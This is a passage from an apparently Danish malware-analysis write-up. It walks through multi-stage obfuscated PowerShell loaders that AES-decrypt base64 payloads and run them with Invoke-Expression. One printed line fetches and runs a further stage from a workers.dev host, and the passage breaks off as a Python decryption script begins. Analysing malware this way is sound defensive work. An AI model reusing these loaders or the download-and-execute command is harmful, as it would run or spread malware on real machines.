qPuFSedJ+udnl4drO1N+3RRLRWbLRKgHOVaNHtJsmEqo6nen72tGUB3K0v6eJfEpLpYGR3661T/ZkGOp6ePgLQpydzzjV3R6IcbeYVg13nY9ZOAZDbyKhzF8Nky+3rC4T5/cH4aJ2v5BSFQoY1hhPKGmauVoo5ALMHZmb+Nw+hx99A6b8/R9qa6Rqxuh76IDS921bXk0qH/9K8vwbFcm+nsVuBMP5i1MtOqXdmceDjnPJFbRU4GZW14xAWHKCnEg8RBmoS2+sjyzV/KDB3vG/O9o0K6qWnaGw6VW6hk8JGxpOwxMrMx1kz3CqGF4bw7xT2LTMH0yxikovjbrePWANLFta6E8zbh6+zHVr5oZ+5ieuZnCUKSznrsQwJtnjPmXtQC6iob9LxlKDzlvNANi1dPF4qL2eROkk3lFgOI55XEg=='
$first = 'Wqy'
$tanker = 'kRGNCMScyy0BG0w+R2k/Na1zBQLdt7x5vSPQVewlO0y5bEOBpyK/hBuyeNVuNdb/mxqtDtw1/MvzqjRz5xXkhMNS9p1/DAgA2jnoIBZipCbonwqqZbI9ZbISx4sjhuQzVMnYBAQ/WDTY+8pkJyh1MonvNhLid6DyjMtRP40/aVSZ7x6peN/UUy0JIir0Ffq9C1nQCy0fCLAgGzTVr/V+ZzmuReZHrBKS+V4Bm19CXDaysYQ83ErvD6dVTQY6V9NncQT0agJbGX3cw3s0eWqfw3VkGCoDftGdznqEFRTtxH/9nxHCTAIplLYeYzaHpwrhdUZAu5ZZtwtxYJXnRtvNqY46fp+ShGyYdgKKT4B/YGNmIyIFi46oBv2ZKF2WeDJ7BnMVKZq6YJhn8RmJ8bqI/Qcsr/+tv694z4f8W8pkl2qviOqhSjRyXYmvS46dslLcxnBetVL2nagQFk0rl/1wqGlKg1jijLVAc4Yn2TC7zD948mSb9Oh/b3qCBzEtQ8Ut7lhkSx8QELjysqsvoeJsJq9T685qBJdOVxQM8T2rcW+ETRVSuZEPrWIYmfs4V6kvlJ/T+vw1fUNSwORTYfhHe6Vc/9/OYfGx7oWZwcTxW0zWM95UMdU7T8xDBbJFm3gRDM5PCjSdFHAAjwL2Wor/G1CRGrqieSfvP99IsKZJOHmciC2uy+7M5PeDHAzzgee3iG/Mh19ZczcEjM7okAyPIAsH3zpKEd25JrUrV6Z0uusKe2bmppTDOOGUByzmGP5ULgJnEplVANdOLJs07CUs8YHZ1mBUR8+vAdOEK54lG3QZCf03neSHg9lRNIonWGYkHbXZ38WiisqQc9Y5AaJYAWbng5G5VvjgMGm0brnRmfKPsQE/C5QgLYWGJ6h9GTFo22djdNPoGZCPsmpHDaxI3tqqUKwmCk/Y+N0Yfugs4nisf4iWl8LVK252szvTPlXVXmTuvPdp2NWleQrszgRfc3rVMNm7oSLxmrjF+mIAsc+WvbtCwKGjnH9Qa8SGan7tyKDYUltueMAlUnubBgaU59RGDEy4ubMFgh5+F7wRhuqpFEWnQepyvdnN/zRfLaq/CFmr3y3dT6KJppq3168GbL+MwV6DWh6s0O8iYRisBa2wk9PgCpzSVuU='
function envious([int]$i) {
abounding($i+18347)
respite($i+39701)
debt($i+59482)
antecedent($i+6065)
hydroxyl($i+5252)
accept($i+48422)
}
$trouble = 'mm6I00jG1EtUlBvMYB8K'
$son = 3815
function cassock([int]$i) {
midden($i+47992)
orator($i+2354)
patience($i+14240)
heel($i+4923)
tree($i+496)
exception($i+23482)
bun($i+617)
strand($i+46746)
quiet($i+47060)
curriculum($i+16110)
stencil($i+61195)
egg($i+32566)
}
function toffee([int]$i) {
actor($i+65426)
squalid($i+38176)
accuracy($i+55227)
frequency($i+691)
impairment($i+25113)
whorl($i+43559)
warden($i+28694)
desk($i+56127)
day($i+10657)
pollution($i+23548)
skate($i+3605)
swan($i+54232)
successful($i+13949)
vulgar($i+64430)
}
$sour = 'S2z5lEz62YgM5spK6wpA0c2DARJk/geo9+y4IjG2oak1Zs/7yc8wMbVl4/KMqwVQL6WsWqjwXXNOgGyMJulNORj7zNBGdzaqTxR/gEMgYSrzlk7VcL7uJ5d+pxcoRq+5HJX+sIPY9j7W4j/qVBehRoKZeW+BFz5NSXp1i2w4suFUGbdh0FScfk59upild4mV1HzD9I1GMOs0ksRh4ZbgRd4N/t1WHAuqeKiCG2jYn47+GASwIt8OvNLtDiX4/0Dpm+2wRJTlcDLQG48XXKHLlm4gmC0G5fRPzJLChGmxWldBjKowMEyo5/Ow9f6FT5l7OQEofj6fee7O0VzdKNl0rhqZ9XUaNfupCBc1jj0gu1e+zzPZdohzof2u/wl+1zTslPkbC3YzySBmufHQVG1d/OXvlWMTghvk3OIs0l9SMjf3SJSgtKZKGLGloKFAzJ5y'
function demonic([int]$i) {
van($i+55784)
economics($i+48566)
weed($i+11128)
depressive($i+16381)
zampone($i+43219)
alien($i+40794)
puma($i+53379)
overcharge($i+29759)
carpeting($i+46614)
chaplain($i+62796)
}
function brow([int]$i) {
subset($i+65072)
cork($i+22404)
octopus($i+32149)
large($i+3413)
emu($i+3533)
berserk($i+41838)
bonsai($i+26584)
poker($i+47192)
pan($i+7983)
perfume($i+9029)
towering($i+29183)
verse($i+39129)
}
function blush([int]$i) {
uplift($i+40490)
airbag($i+25685)
adapter($i+44307)
mend($i+33526)
laparoscope($i+58654)
sky($i+47273)
}
function population([int]$i) {
board($i+47673)
cricketer($i+55540)
vivo($i+63501)
structure($i+26531)
suburb($i+14703)
consonant($i+33406)
excite($i+19618)
relate($i+35184)
antique($i+60545)
}
function broad([int]$i) {
cream($i+28435)
normalize($i+17492)
sender($i+14883)
spot($i+1015)
gator($i+27898)
workout($i+7274)
conifer($i+16831)
ski($i+44682)
map($i+53320)
cat($i+39757)
bunch($i+20836)
hail($i+55206)
cob($i+64965)
crack($i+23987)
snack($i+45599)
possess($i+56083)
cob($i+29742)
implication($i+50956)
parsnip($i+45719)
}
$college = 'd1XTIr'
function dose([int]$i) {
standoff($i+54336)
precedence($i+35821)
seek($i+13810)
wee($i+48821)
head($i+7284)
hay($i+44324)
station($i+27381)
manufacturing($i+65219)
ferryboat($i+42238)
let($i+27799)
vote($i+2888)
roster($i+347)
iris($i+7377)
pink($i+45999)
logic($i+53735)
hash($i+23411)
principle($i+35633)
}
function arrest([int]$i) {
shearling($i+6313)
brake($i+46058)
honorable($i+15677)
}
$hike = 'RqxubPXoRbL2TIHswF7QXwc4zTIHpKpIsa24AtqUreFoopPRTP2WhOILQjeyUy54VZRITlMp7nFWW53ICdAMb95wZBcEPr664JVvk3ljimLWFIKBlkzEFO61G0Lr2DgMIpk6+ZOL7ixwW9juyOwJG9/WUEgNJQad4EpzSbvuaGbRhhCTTg2a3v5QLR0jcYv+GwnxemnMyxsOxncspWl+Anp/vgxbracIx6a+aS/ZpjXI4bPu8tbYNfEW68ix3s2z0OvjpT9SlJKgqjttJErnojQ4MfbcdC8YA9pBhPchtY+EKXgPSwBt61eq5xNETEr7fTLxtUeKCypTta3Rvot7wAUHxi+u6v/4FFbdAIxWCV0f3KP0/5K2JWlxKSwrIaETz8esuEwYvVpjtGzu9j9SsXWj+ER3gC1KMQqVM8YNAujlpmzOawOHl7+JjKtOGukvNeOLuTJl37tWrD4zjt2q1WQ/C/OM9fTkHpHWXXEHU2+ot6jPOZjtFhj2O7a16gjpBssUkMvu6RpEQJoeSAQAqlcP7PDmSkpmvgYhrX84k49yX4RSqCGsXl5ubcv5ZYDwOtvMrRHfScOx8UAkRD2wkzqr1ri8uevYYQHNua4uKjXbzzcdvX+8jAGc+vFD+ZvatcQkgrOwZdwrodc9XPxpfnee9NKMXmfuYUsTaOUmuc0/8n9AcNLUapV1kFYMxjJgzbg6x6jRc8j7xv1P6a8YBDub5rRn1tUG7qr27rxc5XW0UIkd3wlsMiqOgPhdaK7ACxrGtFp7T60WCYljgWxX83nZ57S3MVc3gXHyCVk7ptmxkm1POyPq9rxGbZ/IdBucQYfkXCnWlQVCaKZHXog9PlaAC70qiX/eo2SzgU3Gg5eWtHalj7jTlAyRLKzT0Ovuf9xwdLFJenXg1g=='
$epic = 'Ukw'
$nosy = $cow
if ($cow -eq "") {
$nosy = Read-Host -Prompt 'Variable name'
}
$employ = Get-Variable -Name $nosy -ValueOnly
$modification = $fugato
if ($fugato -eq "") {
$modification = Read-Host -Prompt 'Key Variable name'
}
$percent = Get-Variable -Name $modification -ValueOnly
$hiking = [System.Convert]::FromBase64String($employ)
$sister = [System.Convert]::FromBase64String($percent)
$poverty = @{TypeName="Sys"+"t"+"e"+"m."+"SECu"+"R"+"I"+"Ty.CR"+"YPT"+"OGRa"+"PH"+"y"+".a"+"es"+"mANA"+"GeD";Property=@{("mOd"+"E")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("iV")=$hiking[0..15];}}
$book = New-Object @poverty
$book.("keY")=$sister
[System.Text.Encoding]::UTF8.GetString($book.("c"+"reA"+"tedEc"+"ryPTO"+"R")().TransformFinalBlock($hiking,16,$hiking.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/587e5d6b-202c-4690-9cf4-0ffb672b624b|iex
|
Her er der igen en forspørgsel til jolly-heart-a4be.oluf-sand.workers.dev/update/587e5d6b-202c-4690-9cf4-0ffb672b624b, ved at lave en GET request igen får vi følgende svar:
Klik for at udvide den rå payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
|
param (
[string]$hum = '',
[string]$hood = ''
)
$cool = 'c1dOTat5fnlq0vk619S2eMF+tZRoY2UyovCrwqxgS44='
$olive = 11820
$run = '1GWZL7Tm'
function fen([int]$i) {
sculptural($i+46380)
weave($i+60834)
awake($i+16352)
apple($i+56265)
truck($i+43544)
dinner($i+42751)
halloween($i+10907)
cap($i+4286)
skean($i+5482)
mare($i+41384)
squid($i+31260)
lay($i+3479)
}
function horn([int]$i) {
roll($i+24578)
fiberglass($i+17916)
interval($i+24624)
side($i+16902)
charter($i+2057)
queen($i+61646)
effector($i+8731)
gnu($i+56615)
team($i+14771)
cymbal($i+40122)
nephew($i+45748)
bag($i+55104)
}
function ferret([int]$i) {
perp($i+25624)
zip($i+6443)
keyboard($i+29339)
boom($i+61989)
zipper($i+63293)
joke($i+40437)
rice($i+3266)
rush($i+33772)
fresco($i+18770)
amount($i+34161)
}
function wed([int]$i) {
pince_nez($i+54134)
blush($i+4645)
frigate($i+11984)
}
$cannon = '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'
function orchid([int]$i) {
slimy($i+14152)
familiarity($i+37212)
worried($i+18299)
entree($i+14606)
exposition($i+29364)
underclothes($i+52426)
ornament($i+56489)
hatchling($i+16377)
savory($i+15669)
wit($i+39930)
cravat($i+31434)
resemblance($i+2433)
carving($i+12259)
pup($i+32737)
standoff($i+14183)
percentage($i+9289)
van($i+15532)
walnut($i+19032)
bat($i+747)
}
function core([int]$i) {
hugger($i+34221)
seep($i+49482)
maternity($i+3156)
bother($i+36300)
armpit($i+52120)
chart($i+30010)
edger($i+29491)
used($i+39016)
creek($i+59324)
gerbil($i+21200)
}
function upstairs([int]$i) {
madam($i+38753)
shelter($i+57843)
vol($i+15108)
SUV($i+10754)
local($i+47023)
female($i+12117)
nail($i+29856)
clarification($i+18458)
be($i+59857)
spectacles($i+42150)
monger($i+60052)
span($i+57330)
bun($i+8659)
dining($i+54253)
clasp($i+21075)
}
$swordfish = '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'
function pickup([int]$i) {
calm($i+54510)
yacht($i+45765)
hut($i+60039)
chemical($i+6019)
reluctance($i+57518)
carboxyl($i+33964)
intent($i+40086)
growth($i+57032)
uncertainty($i+29732)
belt($i+16225)
nifty($i+16900)
communicate($i+17740)
scale($i+6245)
write($i+14605)
beginning($i+8755)
rally($i+4530)
colleague($i+59543)
financing($i+22648)
packet($i+18847)
}
$cottage = 'YjdiU5+xwU9cr3cYedlgzPlFlolvLD+BdIw6E4U0tRlS4D/VE8F1nMUsatDJErDT4aiFC+mWnROMddy0x6iL4Sc96DfzWfJXnOlQWtkUBcS7Bkm950E3IDlikbq9zoW42UYF2+l6fXBvf4EMiSoOIRcpZZOGkFg1mX3TpFSGMU0OrG4+JzYSLK8tQPW2jh51I9NgwnpdaRhgZorC3LejdsXKOQGzcvtwbp7e4+Qx/XMmI5GO+owOzp3FvQkqBtSJ0wvCMZF4Ob+UI8g3tBvAh3G+RZ1/4WJB70t/zHL/DvW3UbuSNQkDS8bKNMeZJu8Nr1sxotBp4dPQNK95QPhzqemnhaqGdHjdwi5ToAFAr9OwMaL6ed3bcqLYjHUAepitMnRv5ooursKOvTO7z55vFG/x1JQMlkaUsEQY8qsWFqI/M45FzJvBygkr8vnN9h0RnDZ2CP2cB40/ZiusgxuSNL7X29MKwuA6wBla704NReGWCTMAqSz8MA0yITSgafdbL63kumPSl/7JGFo2kZN9p8tIhBbFRvZCi7pOiMRxHSOqttSdrne5BpUeeepeWIphD9ehLqzwnJWX+r2JkYOdcxLCqR19V9PSB8cDrg7yoyo4/e4eqwjR2IvL58i2PIweBNtcAZG9lzZgYkzZisS4xWRze71Q/LU2WCf/WSNKP4Lue9rmKMWkQ1z4+gMvV7cNW07sjJ5J+6f0GryWLdwGL3HM9YP3QZzkcIq5cFpSTf8eu94yw8uTs7WLCf17+I3d+2U6lrOj63c4/BdlNUVy/c/7bWiWYcfITA3Om9IbD1cUzw6cWFx2TgW80jAjkPiAJoKJ26wP+l4pqA8TvvG3XJb7KBV85AM7jx2/ZYYEAFlrjhWBFC/D3ApMkML5z2gIPgUDtfVooWa+BxaIWs0ZPz2CIu0pEH/1KH7YVRaZU46XeYG1y8oRjClgM9aXhtaTVQioY8aBcOPpZVz9/+G1Vm3t+twd/wlM7bKU8Hso/2Zp0ITlbdNikK+xiVDc/VMkXOmf7YvWaL0cj7uqS9jcYEwfa6COP1a8NmnkJWTJ47bPV8bJ5c4t96spbxCOF79oHF3VP8bDPOu2XdCmYIQ2j2ztnM/osnMftkYKHhLV7TfTusPXraKcHcvfoB4uIFLMQbbYK9W8LxAKRWUHM55bP8brP4z/SPWEqv1JjRiu9gRXtucDsTZ32SXGXiTHdviBywdKBw1Idv1liLF4wvjjrBezBGHxPcYrxL/yrQ+BZnffbhYhMw53/uHTtFzhImr9/0w1oRvvfcB+fbva5Jzt+RoSPBRSBjG6u94BhY5twv/ujSfARxBPbYg93m5RpKTaztSVH2DFbTjX5MTxX0WFzg=='
function composer([int]$i) {
bend($i+2081)
dhow($i+39345)
gigantism($i+50212)
waste($i+62740)
sandbar($i+42412)
}
function ascend([int]$i) {
dissect($i+28112)
township($i+52903)
grasp($i+48930)
shock($i+41066)
tangy($i+51825)
ozone($i+45489)
keyboarding($i+44983)
branch($i+7568)
whirlpool($i+8762)
ruler($i+28412)
scimitar($i+21313)
independent($i+34853)
shaky($i+55550)
}
$diver = $hum
if ($hum -eq "") {
$diver = Read-Host -Prompt 'Variable name'
}
$sportsman = Get-Variable -Name $diver -ValueOnly
$die = $hood
if ($hood -eq "") {
$die = Read-Host -Prompt 'Key Variable name'
}
$editor = Get-Variable -Name $die -ValueOnly
$blind = [System.Convert]::FromBase64String($sportsman)
$righteous = [System.Convert]::FromBase64String($editor)
$combative = @{TypeName="sySt"+"Em.se"+"c"+"uRITy"+"."+"cry"+"pTog"+"RA"+"phY."+"AE"+"Sma"+"naGE"+"D";Property=@{("mO"+"de")=[System.Security.Cryptography.CipherMode]::CBC; Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; BlockSize=128;KeySize=256;("I"+"V")=$blind[0..15];}}
$ask = New-Object @combative
$ask.("kE"+"Y")=$righteous
[System.Text.Encoding]::UTF8.GetString($ask.("CReat"+"E"+"dECr"+"Y"+"PT"+"o"+"r")().TransformFinalBlock($blind,16,$blind.length-16)).Trim([char]0)|&((&g''"cm" ("?"+"?"+'x'))[1])
|
Her sker der noget decryption via AES-256-CBC. Vi kan bruge python til at efterligne det:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
import base64
from Crypto.Cipher import AES
